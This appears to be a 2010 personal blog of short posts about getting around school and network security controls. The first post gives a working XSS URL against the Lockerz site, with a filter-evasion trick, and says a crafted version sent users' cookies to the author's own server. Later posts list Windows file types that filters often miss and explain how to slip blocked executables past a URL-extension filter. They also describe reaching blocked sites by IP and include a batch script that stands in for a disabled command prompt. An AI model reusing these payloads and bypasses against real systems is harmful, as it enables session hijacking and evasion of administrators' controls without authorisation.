20 Feb 2010 at 17:49
Angelo
Uncategorized
No Comments
Lockerz has a major exploit in it’s redeem page. (Note you can only get there if the redeeming is up)
http://ptzplace.lockerz.com/welcome.php?m=f&e=” onMouonMouseOverseOver=alert(document.cookie); bullshit=”
You can see the page goes to the Failed to Login page and sets the username to the e parameter. You can hijack into the <input> tag by closing off the property string with a “-character, then putting your code in. onMouseOver is filtered out, so you need to put onMoonMouseOveruseOver or something like that to filter the mid of the word and merge the 2 sides to each other. After that, you can’t use any “-characters because it always puts a \ in front of them. To make strings, you can use String.fromCharCode(chrCode1, chrCode2, chrCode3) etc.. It’s that easy!
I’ve crafted a URL that sends the users’ cookie to my server as soon as their mouse hovers over the username field. This has proven to actually work, even when users are logged in to PtzPlace.
Note: I will be posting more of these blog posts. 
Update: I think Lockerz fixed this. Haven’t got a confirmation though.
19 Feb 2010 at 21:10
Angelo
Uncategorized
No Comments
System administrators block certain files in network-traffic or your documents folders. Below are a few that are often forgot about.
- PIF – Shortcut to MS-DOS Program (Identical to EXE files) This was a new discovery for me too, actually…
- HTA – HTML Applications (Identical with HTML files, but with all permissions)
- JSE – Javascript Encoded Script File (Identical to JS files)
- VBE – Visual Basic Encoded Script File (Identical to VB or VBS files)
- WSF – Windows Script File (Can contain multiple scripts. More information)
- LNK – Shortcut (This is likely to be blocked, though)
- SCR – Screensaver (This is likely to be blocked, though)
- URL – Shortcut (This is likely to be blocked, though)
And that’s most of them. There’s a full list here.
10 Feb 2010 at 17:40
Angelo
Uncategorized
No Comments
I know I know, everybody already knows how to do this. Either use proxies or use the IP’s. Not many people know how to visit sites by it’s IP, so here’s a quick guide.
- Go to http://network-tools.com/
- Check the Ping field.
- Enter the website you want to “unblock” in the field below. It says by default your IP address. Just enter a domain, for example: www.yoyogames.com
- Click on GO!
- You will see something similair to this:
Ping 78.129.196.206
[www.yoyogames.com]
- Copy and paste the IP address, and put it in your browser URL bar like this: http://78.129.196.206/
And that’s it.
I know I haven’t posted a lot in a while and this is a fairly simple post. That is because I’m preparing for a much bigger blog post coming up in the next few days. Stay tuned. It’s gonna be an interesting read.
Edit: Or not. Depends..
05 Feb 2010 at 10:48
Angelo
School computers
2 Comments
At our school, there is a protection against file extensions you can dowload. For example, everything ending with .exe or .bat gives the following error:
Taking a look at the following url which obviously doesn’t exist will give the same error as above: http://www.google.com/thisfiledoesnotexist.exe
That means the network simply checks if the requested url ends with “.exe” and then blocks it. So that’s easily bypassable. Simply by adding a questionmark (?) to the end of the url allows us to download the blocked file extension. Unfortunately, IE7 doesn’t allow executables to be downloaded this way to be executed instead of saved. With IE7 you can only download batch files this way. (Edit: You might want to try adding ?.pif at the end of the URL for EXE files.) Take a look at the screenshot below, which is a batch file downloaded by adding a ? to the end of the URL:
You can see, it’s dead simple. This also brings me to the next point, which is command prompt not by simply using the “cmd” executable, but crafting a special batch file to imitate command prompts features. The following code is necessary to achieve this:
@echo off
cls
:RTN
SET /P cmd=^>
%cmd%
goto RTN
pause
So that’s it, the basics of downloading blocked file extensions. Ofcourse you can also set up your own server with a PHP script to send over an executable through an octet-stream, but I’m not gonna go into depth on that.
System admins; be warned. People can do all kinds of stuff to your computers! 
04 Feb 2010 at 18:00
Angelo
Uncategorized
3 Comments
Hello there! You might wonder.. (or not) what happened to my blog? Well, don’t worry. I still have a database backup. If you want to see an old post, just post a comment on this article.
So what happened? There are too many system admins doing their work wrong. You might know what I mean with that, or if you don’t, here’s a list:
- They block certain sites.
- They install a filter that disallows downloading of certain filetypes.
- They make all users non-admin users to disallow installation of programs onto the computer.
- They force us to use the worst web browser ever. (You know which one I mean. )
- They automatically remove all executables, batch files, rar and zip files, etc.
And more. All nice things to do, but usually there’s too many flaws in these security measures. I will cover all of the above points and more in future blogposts, so stay tuned.
Remember, this blog is not about hacking. It’s about pointing out the flaws IT professionals often make on their computer networks.
11 Oct 2009 at 14:38
Angelo
Uncategorized
No Comments
Ok guys as I found it extremely hard to achieve this I want to share how I finally managed to get it working.
Here’s a tutorial! Continue reading →
